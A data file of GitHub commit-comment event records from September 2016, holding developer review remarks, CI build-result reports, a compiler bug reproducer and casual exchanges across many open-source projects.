{"id":"4605704824","type":"CommitCommentEvent","actor":{"login":"1000ch"},"repo":{"name":"1000ch/atom-svgo"},"payload":{"comment":{"id":19138518,"position":null,"line":null,"path":null,"commit_id":"494190c1b7db344da42b12572789697db9d2e6a4","created_at":"2016-09-22T23:25:25Z","updated_at":"2016-09-22T23:25:25Z","body":"Sometime, `*.svg` files are accidentally detected as `xml` by Atom, and then there are no menu from this plugin. To avoid, I removed it temporary."}},"created_at":"2016-09-22T23:25:25Z"}
{"id":"4605705680","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19138521,"position":null,"line":null,"path":null,"commit_id":"9f7073c21162fe6ff1ffd1d0964bb8f613806638","created_at":"2016-09-22T23:25:39Z","updated_at":"2016-09-22T23:25:39Z","body":"i could change it to call this only if cookies, history, and cache are being cleared at once"}},"created_at":"2016-09-22T23:25:39Z"}
{"id":"4605707644","type":"CommitCommentEvent","actor":{"login":"DomT4"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19138528,"position":null,"line":null,"path":null,"commit_id":"21e1537c91c34a445122357830b0802ca23d6dc0","created_at":"2016-09-22T23:26:16Z","updated_at":"2016-09-22T23:26:16Z","body":"Going to try rebuilding the bottles. See if that solves the problem or whether this is some deeper issue."}},"created_at":"2016-09-22T23:26:16Z"}
{"id":"4605710717","type":"CommitCommentEvent","actor":{"login":"arvidn"},"repo":{"name":"arvidn/libtorrent"},"payload":{"comment":{"id":19138533,"position":13,"line":57,"path":"examples/simple_client.cpp","commit_id":"70199041f75fd3987889b7b8706ba670f05cf643","created_at":"2016-09-22T23:27:11Z","updated_at":"2016-09-22T23:27:11Z","body":"ouch :P"}},"created_at":"2016-09-22T23:27:11Z"}
{"id":"4605710749","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19138534,"position":null,"line":null,"path":null,"commit_id":"89a2214f5e9b3170f741fc57fb6c3d24f1008940","created_at":"2016-09-22T23:27:12Z","updated_at":"2016-09-22T23:27:12Z","body":"develop (Unknown) - i386-Windows-7-VisualStudio-12: Tests Failed (2060 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-89a2214f5e9b3170f741fc57fb6c3d24f1008940-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-89a2214f5e9b3170f741fc57fb6c3d24f1008940-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-84.15%25-red.svg)</a> \n"}},"created_at":"2016-09-22T23:27:12Z"}
{"id":"4605713056","type":"CommitCommentEvent","actor":{"login":"cing"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19138535,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T23:27:53Z","updated_at":"2016-09-22T23:27:53Z","body":"Thanks a lot for looking into this! I think the lesson is that it's KNN or die. Is there a standard citation for that estimator?"}},"created_at":"2016-09-22T23:27:53Z"}
{"id":"4605714252","type":"CommitCommentEvent","actor":{"login":"jdm"},"repo":{"name":"glennw/servo"},"payload":{"comment":{"id":19138536,"position":null,"line":null,"path":null,"commit_id":"5fa859fcd97d8bb9dec641f84397c470550aaad4","created_at":"2016-09-22T23:28:17Z","updated_at":"2016-09-22T23:28:17Z","body":"These changes will need to be upstreamed as well."}},"created_at":"2016-09-22T23:28:17Z"}
{"id":"4605714296","type":"CommitCommentEvent","actor":{"login":"AgentTelme"},"repo":{"name":"Telmetrics/Plato.NET"},"payload":{"comment":{"id":19138537,"position":null,"line":null,"path":null,"commit_id":"89bed38213deaf3207ef0b75f2c971d47725fab2","created_at":"2016-09-22T23:28:18Z","updated_at":"2016-09-22T23:28:18Z","body":"TeamCity Shared Libraries :: Plato.NET :: CI [Build 5.0.0.75](http://devbuildmngr.dev.com/viewLog.html?buildId=129414&buildTypeId=Shared_PlatoNet_Ci) is now running\n"}},"created_at":"2016-09-22T23:28:18Z"}
{"id":"4605716590","type":"CommitCommentEvent","actor":{"login":"jdm"},"repo":{"name":"glennw/servo"},"payload":{"comment":{"id":19138546,"position":3,"line":3,"path":"tests/wpt/metadata-css/css-transforms-1_dev/html/scale-zero-001.htm.ini","commit_id":"4c6aad5fae4c598d23b2fb0a40eab0e766c44aec","created_at":"2016-09-22T23:28:58Z","updated_at":"2016-09-22T23:28:58Z","body":"Have we figured out why this crashes?"}},"created_at":"2016-09-22T23:28:58Z"}
{"id":"4605716826","type":"CommitCommentEvent","actor":{"login":"AgentTelme"},"repo":{"name":"Telmetrics/Plato.NET"},"payload":{"comment":{"id":19138548,"position":null,"line":null,"path":null,"commit_id":"89bed38213deaf3207ef0b75f2c971d47725fab2","created_at":"2016-09-22T23:29:03Z","updated_at":"2016-09-22T23:29:03Z","body":"TeamCity Shared Libraries :: Plato.NET :: CI [Build 5.0.0.75.89bed38](http://devbuildmngr.dev.com/viewLog.html?buildId=129414&buildTypeId=Shared_PlatoNet_Ci) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:40"}},"created_at":"2016-09-22T23:29:03Z"}
{"id":"4605717605","type":"CommitCommentEvent","actor":{"login":"hyperreality"},"repo":{"name":"hyperreality/Poetry-Tools"},"payload":{"comment":{"id":19138550,"position":null,"line":null,"path":null,"commit_id":"83bf5d5941219e8947b4f8ca0b557614b23d9b60","created_at":"2016-09-22T23:29:15Z","updated_at":"2016-09-22T23:29:15Z","body":"@mchav Yes I just added the MIT License, do whatever you like :)"}},"created_at":"2016-09-22T23:29:15Z"}
{"id":"4605717838","type":"CommitCommentEvent","actor":{"login":"jdm"},"repo":{"name":"glennw/servo"},"payload":{"comment":{"id":19138552,"position":3,"line":3,"path":"tests/wpt/metadata-css/css-transforms-1_dev/html/transform3d-scale-004.htm.ini","commit_id":"4c6aad5fae4c598d23b2fb0a40eab0e766c44aec","created_at":"2016-09-22T23:29:20Z","updated_at":"2016-09-22T23:29:20Z","body":"Reason?"}},"created_at":"2016-09-22T23:29:20Z"}
{"id":"4605720351","type":"CommitCommentEvent","actor":{"login":"cing"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19138562,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T23:30:07Z","updated_at":"2016-09-22T23:30:07Z","body":"I guess it's still not clear why I'm having this problem when I'm using \"unnormalized\" mutual information?"}},"created_at":"2016-09-22T23:30:07Z"}
{"id":"4605725738","type":"CommitCommentEvent","actor":{"login":"f3rnando"},"repo":{"name":"steemit-intl/steemit.com"},"payload":{"comment":{"id":19138580,"position":null,"line":null,"path":null,"commit_id":"1a78275226f1c04298ab130d175590f5f3190416","created_at":"2016-09-22T23:31:42Z","updated_at":"2016-09-22T23:31:42Z","body":":+1: "}},"created_at":"2016-09-22T23:31:42Z"}
{"id":"4605730732","type":"CommitCommentEvent","actor":{"login":"stumitchell"},"repo":{"name":"lfn3/akl-clj-spec"},"payload":{"comment":{"id":19138592,"position":null,"line":null,"path":null,"commit_id":"088256dda8b69f6108de60246cfda7ac89a0ad44","created_at":"2016-09-22T23:33:14Z","updated_at":"2016-09-22T23:33:14Z","body":"Looks like you accidently checked in some answers"}},"created_at":"2016-09-22T23:33:14Z"}
{"id":"4605730735","type":"CommitCommentEvent","actor":{"login":"cxhernandez"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19138593,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T23:33:14Z","updated_at":"2016-09-22T23:33:14Z","body":">Is there a standard citation for that estimator?\r\n\r\n```\r\n@article{PhysRevE.69.066138,\r\n  title = {Estimating mutual information},\r\n  author = {Kraskov, Alexander and St\\\"ogbauer, Harald and Grassberger, Peter},\r\n  journal = {Phys. Rev. E},\r\n  volume = {69},\r\n  issue = {6},\r\n  pages = {066138},\r\n  numpages = {16},\r\n  year = {2004},\r\n  month = {Jun},\r\n  publisher = {American Physical Society},\r\n  doi = {10.1103/PhysRevE.69.066138},\r\n  url = {http://link.aps.org/doi/10.1103/PhysRevE.69.066138}\r\n}\r\n```"}},"created_at":"2016-09-22T23:33:14Z"}
{"id":"4605735900","type":"CommitCommentEvent","actor":{"login":"lfn3"},"repo":{"name":"lfn3/akl-clj-spec"},"payload":{"comment":{"id":19138607,"position":null,"line":null,"path":null,"commit_id":"088256dda8b69f6108de60246cfda7ac89a0ad44","created_at":"2016-09-22T23:34:48Z","updated_at":"2016-09-22T23:34:48Z","body":"Yes, yes I did. Thanks for pointing that out!"}},"created_at":"2016-09-22T23:34:48Z"}
{"id":"4605736524","type":"CommitCommentEvent","actor":{"login":"cxhernandez"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19138609,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T23:34:58Z","updated_at":"2016-09-22T23:34:58Z","body":"> I guess it's still not clear why I'm having this problem when I'm using \"unnormalized\" mutual information?\r\n\r\nHave by chance you tried it without shuffling?"}},"created_at":"2016-09-22T23:34:58Z"}
{"id":"4605739022","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19138617,"position":null,"line":null,"path":null,"commit_id":"ddac25ead8e420f43156f5ea4bd324d87a8b529f","created_at":"2016-09-22T23:35:44Z","updated_at":"2016-09-22T23:35:44Z","body":"Breaks on OS X when `CXX` is a MacPorts GCC compiler."}},"created_at":"2016-09-22T23:35:44Z"}
{"id":"4605750866","type":"CommitCommentEvent","actor":{"login":"kunnix"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19138653,"position":null,"line":null,"path":null,"commit_id":"1adaa22d7a6cc83ce09638e2cae00fc6f6589857","created_at":"2016-09-22T23:39:15Z","updated_at":"2016-09-22T23:39:15Z","body":"Not sure why this went live, apparently it's an incomplete version of leaflet.d.ts (WIP).\r\n\r\nIt was pushed into `@types/leaflet@1.0.33`. Reverting to `npm install --save @types/leaflet@1.0.32` provides correct typing."}},"created_at":"2016-09-22T23:39:15Z"}
{"id":"4605751313","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":19138659,"position":null,"line":null,"path":null,"commit_id":"26c94648b2bb5e099d0b2891e1c6f6c2bf086f04","created_at":"2016-09-22T23:39:23Z","updated_at":"2016-09-22T23:39:23Z","body":"I do not suggest removing the check for `len(var) > 0`. While it true that `read_csv` now checks for empty column names, it is only one of many ways to create a table in the database. For example, a user can write `CREATE TABLE foo ('' REAL)` and then use `read_csv` without a header to populate the table."}},"created_at":"2016-09-22T23:39:23Z"}
{"id":"4605753948","type":"CommitCommentEvent","actor":{"login":"procedural"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19138670,"position":16,"line":427,"path":"utils/sv_IO_panel_tools.py","commit_id":"84db7392d70c885f8be48fb482b0380bec774be5","created_at":"2016-09-22T23:40:15Z","updated_at":"2016-09-22T23:40:15Z","body":"I got an error on this line about `ng` when I import a node, pretty sure it should be called `group_ng`?"}},"created_at":"2016-09-22T23:40:15Z"}
{"id":"4605757965","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":19138677,"position":null,"line":null,"path":null,"commit_id":"26c94648b2bb5e099d0b2891e1c6f6c2bf086f04","created_at":"2016-09-22T23:41:27Z","updated_at":"2016-09-22T23:41:27Z","body":"Second comment: this commit appears to mix two types of changes\r\n- Removing the `if-else` branch of `len(var) > 0`.\r\n- Changing some logic on lines 489-500\r\nIn general, each commit should contain a single reviewable diff."}},"created_at":"2016-09-22T23:41:27Z"}
{"id":"4605758709","type":"CommitCommentEvent","actor":{"login":"traveling-desi"},"repo":{"name":"traveling-desi/coding-challenge"},"payload":{"comment":{"id":19138679,"position":null,"line":null,"path":null,"commit_id":"4a1a8a7d7329f595f5f32bcba5f7d9abaa32e341","created_at":"2016-09-22T23:41:41Z","updated_at":"2016-09-22T23:41:41Z","body":"DOC: Updated README.md"}},"created_at":"2016-09-22T23:41:41Z"}
{"id":"4605758990","type":"CommitCommentEvent","actor":{"login":"cleverSheep"},"repo":{"name":"cleverSheep/Networking-Application"},"payload":{"comment":{"id":19138680,"position":4,"line":49,"path":"src/Connection/Server.java","commit_id":"c671ac0d75595e008f6d78f7fee18445f59dc853","created_at":"2016-09-22T23:41:45Z","updated_at":"2016-09-22T23:41:45Z","body":"ArrayIndexOutOfBoundsException"}},"created_at":"2016-09-22T23:41:45Z"}
{"id":"4605759687","type":"CommitCommentEvent","actor":{"login":"simurai"},"repo":{"name":"atom/atom"},"payload":{"comment":{"id":19138684,"position":null,"line":null,"path":null,"commit_id":"da09ebbc4b4e3c0930e340d68806b07ec963f7c6","created_at":"2016-09-22T23:41:56Z","updated_at":"2016-09-22T23:41:56Z","body":"@nathansobo 👍  Sounds good. https://github.com/styleguide/css is actually now only availbable internally and 404s for non GitHub employees."}},"created_at":"2016-09-22T23:41:56Z"}
{"id":"4605770540","type":"CommitCommentEvent","actor":{"login":"wbierman"},"repo":{"name":"recastnavigation/recastnavigation"},"payload":{"comment":{"id":19138702,"position":7,"line":32,"path":"Recast/Source/RecastLayers.cpp","commit_id":"9763478a9aab52354289f403c9ea51103d74f469","created_at":"2016-09-22T23:44:59Z","updated_at":"2016-09-22T23:44:59Z","body":"Can you change this to something like:\r\n\r\n    #ifndef RC_MAX_LAYERS\r\n    #define RC_MAX_LAYERS 63\r\n    #endif\r\n\r\nThis will let us override by reconfiguring the build environment to add a preprocessor definition thereby avoiding having to modify a submodule."}},"created_at":"2016-09-22T23:44:59Z"}
{"id":"4605771028","type":"CommitCommentEvent","actor":{"login":"bmatcuk"},"repo":{"name":"bmatcuk/doublestar"},"payload":{"comment":{"id":19138707,"position":null,"line":null,"path":null,"commit_id":"915f3ccc3f08f02a828ab8b01b10702d7b49fa30","created_at":"2016-09-22T23:45:10Z","updated_at":"2016-09-22T23:45:10Z","body":"You're welcome! I'm not sure why go has `path.Match()` and `filepath.Match()`, but I wanted to support both functions in case someone needed to rely on the fact that `path.Match()` always uses `/`."}},"created_at":"2016-09-22T23:45:10Z"}
{"id":"4605779193","type":"CommitCommentEvent","actor":{"login":"amilner42"},"repo":{"name":"amilner42/mea2n-kickstarter"},"payload":{"comment":{"id":19138730,"position":null,"line":null,"path":null,"commit_id":"8b60622b176e6a3c6f757c24683df10e9c601579","created_at":"2016-09-22T23:47:39Z","updated_at":"2016-09-22T23:47:39Z","body":"Minor fixes:\r\n\r\n1. Stringify POST body\r\n2. Passport uses `username`, not `email`"}},"created_at":"2016-09-22T23:47:39Z"}
{"id":"4605780552","type":"CommitCommentEvent","actor":{"login":"AlexIIL"},"repo":{"name":"BuildCraft/BuildCraft"},"payload":{"comment":{"id":19138736,"position":9,"line":96,"path":"common/buildcraft/factory/block/BlockTank.java","commit_id":"b9f6f7311977c74611a87f1c0739a5dc7c0de0fb","created_at":"2016-09-22T23:48:06Z","updated_at":"2016-09-22T23:48:06Z","body":"This fixes #3137 (I think)"}},"created_at":"2016-09-22T23:48:06Z"}
{"id":"4605783106","type":"CommitCommentEvent","actor":{"login":"MrMagma"},"repo":{"name":"Gigabyte-Giant/Bad-Kernel"},"payload":{"comment":{"id":19138745,"position":null,"line":null,"path":null,"commit_id":"cc1ace80aade36da62978e50d6611a4a1f7f7ada","created_at":"2016-09-22T23:48:56Z","updated_at":"2016-09-22T23:48:56Z","body":"This should have been written with Snap as per the discussion in Slack."}},"created_at":"2016-09-22T23:48:56Z"}
{"id":"4605790691","type":"CommitCommentEvent","actor":{"login":"mkillianey"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":19138762,"position":null,"line":null,"path":null,"commit_id":"de730de7cc0a58a1e4aafaf67465fed650b350d8","created_at":"2016-09-22T23:51:16Z","updated_at":"2016-09-22T23:51:16Z","body":"The title/description of this commit is misleading.  The original (unreviewed) commit did, indeed change the logic of what gets built during `buck project`, but this change does no such thing."}},"created_at":"2016-09-22T23:51:16Z"}
{"id":"4605791764","type":"CommitCommentEvent","actor":{"login":"AlexIIL"},"repo":{"name":"BuildCraft/BuildCraft"},"payload":{"comment":{"id":19138767,"position":15,"line":15,"path":"common/buildcraft/transport/client/model/IPipeBaseModelGen.java","commit_id":"b9f6f7311977c74611a87f1c0739a5dc7c0de0fb","created_at":"2016-09-22T23:51:36Z","updated_at":"2016-09-22T23:51:36Z","body":"TODO: add a \"texture stitch + model bake\" event so that the custom generator can make its textures and quads.\r\n\r\n(Essentially the base work for allowing a custom connected textures baker)"}},"created_at":"2016-09-22T23:51:36Z"}
{"id":"4605793714","type":"CommitCommentEvent","actor":{"login":"goldpbear"},"repo":{"name":"smartercleanup/discuss"},"payload":{"comment":{"id":19138774,"position":null,"line":null,"path":null,"commit_id":"8f8c67d32c761e5d79cc9a24855ecf6255821b6f","created_at":"2016-09-22T23:52:12Z","updated_at":"2016-09-22T23:52:12Z","body":"@zmbc Thanks for this overview! It's useful to have such explicit options laid out next to one another.\r\n\r\nAfter reading this through, it seems like option 3 comes closest to our ambitions for a SaaS platform, no? We had discussed a platform where all content and style changes could be made through a web interface, minimizing (or in fact perhaps eliminating) the need to change any code or configuration files.\r\n\r\nIt's ambitious, but I think it's an exciting goal to shoot for. I'd love to learn more about what it would take to implement an architecture like this."}},"created_at":"2016-09-22T23:52:12Z"}
{"id":"4605795376","type":"CommitCommentEvent","actor":{"login":"Gigabyte-Giant"},"repo":{"name":"Gigabyte-Giant/Bad-Kernel"},"payload":{"comment":{"id":19138780,"position":null,"line":null,"path":null,"commit_id":"cc1ace80aade36da62978e50d6611a4a1f7f7ada","created_at":"2016-09-22T23:52:43Z","updated_at":"2016-09-22T23:52:43Z","body":"Even though I'm learning, I'm not that stupid...\r\n\r\nSent from my iPhone\r\n\r\n> On Sep 22, 2016, at 18:49, Joshua Gammage <notifications@github.com> wrote:\r\n> \r\n> This should have been written with Snap as per the discussion in Slack.\r\n> \r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub, or mute the thread.\r\n> \r\n"}},"created_at":"2016-09-22T23:52:43Z"}
{"id":"4605804044","type":"CommitCommentEvent","actor":{"login":"jaymzh"},"repo":{"name":"coderanger/ohai"},"payload":{"comment":{"id":19138792,"position":8,"line":23,"path":"DOC_CHANGES.md","commit_id":"6d958602de66c1d11db88274454db6752757d286","created_at":"2016-09-22T23:55:17Z","updated_at":"2016-09-22T23:55:17Z","body":"s/plugins/plugin/"}},"created_at":"2016-09-22T23:55:17Z"}
{"id":"4605804985","type":"CommitCommentEvent","actor":{"login":"jaymzh"},"repo":{"name":"coderanger/ohai"},"payload":{"comment":{"id":19138796,"position":null,"line":null,"path":null,"commit_id":"6d958602de66c1d11db88274454db6752757d286","created_at":"2016-09-22T23:55:36Z","updated_at":"2016-09-22T23:55:36Z","body":" Better, minus the typo."}},"created_at":"2016-09-22T23:55:36Z"}
{"id":"4605810495","type":"CommitCommentEvent","actor":{"login":"Arcanemagus"},"repo":{"name":"AtomLinter/linter-puppet-lint"},"payload":{"comment":{"id":19138811,"position":null,"line":null,"path":null,"commit_id":"7070ee06f59cfdbbd5e03f75d8a57a54c2e39a42","created_at":"2016-09-22T23:57:22Z","updated_at":"2016-09-22T23:57:22Z","body":"It was added in Atom v1.4.0, and allows Atom to simply parse the `package.json` instead of having to load up the entire package just to get the settings. It is a speed increase for Atom but makes no difference to how the package works since the API for accessing the configuration handles either place equally well."}},"created_at":"2016-09-22T23:57:22Z"}
{"id":"4600155998","type":"CommitCommentEvent","actor":{"login":"congvi"},"repo":{"name":"congvi/thuphat"},"payload":{"comment":{"id":19124240,"position":13,"line":17,"path":"src/List/List.jsx","commit_id":"cee2893fe294ff8a8ed7f451aba61280e879a860","created_at":"2016-09-22T03:00:42Z","updated_at":"2016-09-22T03:00:42Z","body":"file nay dai qua"}},"created_at":"2016-09-22T03:00:42Z"}
{"id":"4600156528","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19124242,"position":null,"line":null,"path":null,"commit_id":"e4d1462e3a886435605774b4be3d24de7edde369","created_at":"2016-09-22T03:00:54Z","updated_at":"2016-09-22T03:00:54Z","body":"@nanosoldier `runbenchmarks(ALL, vs = \"@ad77c0e\")`"}},"created_at":"2016-09-22T03:00:54Z"}
{"id":"4600156878","type":"CommitCommentEvent","actor":{"login":"AaroniusH"},"repo":{"name":"AaroniusH/soundbounce"},"payload":{"comment":{"id":19124243,"position":null,"line":null,"path":null,"commit_id":"0cfff7bcde5bf7aac3021a87142f3f412cabb6ed","created_at":"2016-09-22T03:01:04Z","updated_at":"2016-09-22T03:01:04Z","body":"Fixed it. We're good."}},"created_at":"2016-09-22T03:01:04Z"}
{"id":"4600159119","type":"CommitCommentEvent","actor":{"login":"instructian"},"repo":{"name":"instructian/instructian.github.io"},"payload":{"comment":{"id":19124247,"position":null,"line":null,"path":null,"commit_id":"5586bcb969ee22fd42b51febdebad21c93e9ac9f","created_at":"2016-09-22T03:01:57Z","updated_at":"2016-09-22T03:01:57Z","body":"1"}},"created_at":"2016-09-22T03:01:57Z"}
{"id":"4600159261","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124248,"position":null,"line":null,"path":null,"commit_id":"97d4bf4587a4590db4273d5da9798afc6dbaaf0f","created_at":"2016-09-22T03:02:00Z","updated_at":"2016-09-22T03:02:00Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2372 of 2374 tests passed, 6 test warnings)\n\n * 3 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 6 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T03:02:00Z"}
{"id":"4600160304","type":"CommitCommentEvent","actor":{"login":"Brucezhangpj"},"repo":{"name":"zzyybs/dubbo"},"payload":{"comment":{"id":19124250,"position":null,"line":null,"path":null,"commit_id":"27917f2e86bbd97ee047d69817730a57bdf5ad6b","created_at":"2016-09-22T03:02:26Z","updated_at":"2016-09-22T03:02:26Z","body":"传说中的Dobbo出现啦！"}},"created_at":"2016-09-22T03:02:26Z"}
{"id":"4600160544","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19124251,"position":null,"line":null,"path":null,"commit_id":"6f69ea91db254a2d03250dc6de5a451ba6a56c5f","created_at":"2016-09-22T03:02:31Z","updated_at":"2016-09-22T03:02:31Z","body":"@nanosoldier `runbenchmarks(ALL, vs=\"@47ec910d2db23ab96024569b5bd6bb75e8053251\")`"}},"created_at":"2016-09-22T03:02:31Z"}
{"id":"4600160962","type":"CommitCommentEvent","actor":{"login":"fgc346"},"repo":{"name":"fgc346/hello-world"},"payload":{"comment":{"id":19124253,"position":4,"line":4,"path":"README.md","commit_id":"5ee5d1807e6f6a4401cda5b348d604787ed25608","created_at":"2016-09-22T03:02:43Z","updated_at":"2016-09-22T03:02:43Z","body":"Just another repository"}},"created_at":"2016-09-22T03:02:43Z"}
{"id":"4600161137","type":"CommitCommentEvent","actor":{"login":"felixangell"},"repo":{"name":"felixangell/risp-risp"},"payload":{"comment":{"id":19124254,"position":1,"line":1,"path":"README.md","commit_id":"a343ebe822a8112bb164b2eb8e223d328ec3d9e4","created_at":"2016-09-22T03:02:48Z","updated_at":"2016-09-22T03:02:48Z","body":"@raoulvdberge"}},"created_at":"2016-09-22T03:02:48Z"}
{"id":"4600161902","type":"CommitCommentEvent","actor":{"login":"NuLogicSystems"},"repo":{"name":"NuLogicSystems/PKGBUILD"},"payload":{"comment":{"id":19124255,"position":null,"line":null,"path":null,"commit_id":"511968003bd1d630d74aa7fda6a5357c78199adc","created_at":"2016-09-22T03:03:08Z","updated_at":"2016-09-22T03:03:08Z","body":"No of course not, EGL works just as good under x11 as GLX if not even better.\r\nEGL is however required for hardware acceleration under Wayland, otherwise only the software renderer would be available."}},"created_at":"2016-09-22T03:03:08Z"}
{"id":"4600162183","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19124256,"position":null,"line":null,"path":null,"commit_id":"cc650542018a216e1af66982885877a68cd80a16","created_at":"2016-09-22T03:03:15Z","updated_at":"2016-09-22T03:03:15Z","body":"LOL\r\nI compiled new media drivers with cm13 caf-msm8996 branch. Working on stock rom!\r\nAnd my kernel will keep your new vidc ports.\r\n\r\nJust flash it:\r\nhttps://drive.google.com/open?id=0B0xYpwVy6VQaX2RhZzBXVTgyZnc\r\n\r\nP.S.  I have not test other HW decoder. Please backup lib/lib64 libOmxVdec.so."}},"created_at":"2016-09-22T03:03:15Z"}
{"id":"4600163294","type":"CommitCommentEvent","actor":{"login":"olegendo"},"repo":{"name":"erikvarga/gcc"},"payload":{"comment":{"id":19124258,"position":null,"line":null,"path":null,"commit_id":"f854f87640051fc35d06a02283eac46d85af6740","created_at":"2016-09-22T03:03:43Z","updated_at":"2016-09-22T03:03:43Z","body":"There are some assertions when compiling CSiBE.\r\n\r\ninternal compiler error: in gen_address_mod_1, at ams.cc:2254\r\n\r\nHere is one reduced reproducer.\r\n\r\n---------------\r\ntypedef struct jpeg_common_struct * j_common_ptr;\r\n\r\ntypedef struct\r\n{\r\n  void (*error_exit) (j_common_ptr cinfo);\r\n  int msg_code;\r\n} jpeg_error_mgr;\r\n\r\ntypedef struct\r\n{\r\n  unsigned int last_rowsperchunk;\r\n} jpeg_memory_mgr;\r\n\r\nstruct jpeg_common_struct\r\n{\r\n  jpeg_error_mgr * err;\r\n  jpeg_memory_mgr * mem;\r\n};\r\n\r\nvoid\r\nalloc_barray (j_common_ptr cinfo, int pool_id,\r\n              unsigned int blocksperrow, unsigned int numrows)\r\n{\r\n  jpeg_memory_mgr* mem = cinfo->mem;\r\n\r\n  unsigned int rowsperchunk;\r\n  long ltemp = (1000000000L - 12) / ((long)blocksperrow * 4);\r\n\r\n  if (ltemp <= 0)\r\n    (cinfo->err->msg_code = (44), (*cinfo->err->error_exit) (cinfo));\r\n  if (ltemp < (long) numrows)\r\n    rowsperchunk = (unsigned int) ltemp;\r\n  else\r\n    rowsperchunk = numrows;\r\n\r\n  mem->last_rowsperchunk = rowsperchunk;\r\n}\r\n"}},"created_at":"2016-09-22T03:03:43Z"}
{"id":"4600164414","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124259,"position":null,"line":null,"path":null,"commit_id":"842606b3fc7815ff50fb0c6ecb91716f9b5185db","created_at":"2016-09-22T03:04:12Z","updated_at":"2016-09-22T03:04:12Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1765 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T03:04:12Z"}
{"id":"4600164514","type":"CommitCommentEvent","actor":{"login":"Brucezhangpj"},"repo":{"name":"zzyybs/dubbo"},"payload":{"comment":{"id":19124260,"position":null,"line":null,"path":null,"commit_id":"27917f2e86bbd97ee047d69817730a57bdf5ad6b","created_at":"2016-09-22T03:04:15Z","updated_at":"2016-09-22T03:04:15Z","body":"传说中的Dubbo"}},"created_at":"2016-09-22T03:04:15Z"}
{"id":"4600167585","type":"CommitCommentEvent","actor":{"login":"blckcotton"},"repo":{"name":"FAUMobileWeb/Template"},"payload":{"comment":{"id":19124266,"position":null,"line":null,"path":null,"commit_id":"b05ef9ce476f346508bdb39dd4b181720e555959","created_at":"2016-09-22T03:05:35Z","updated_at":"2016-09-22T03:05:35Z","body":"Lamp link http://lamp.cse.fau.edu/~jcotton2016/Web-Hwk1/Amortization.html"}},"created_at":"2016-09-22T03:05:35Z"}
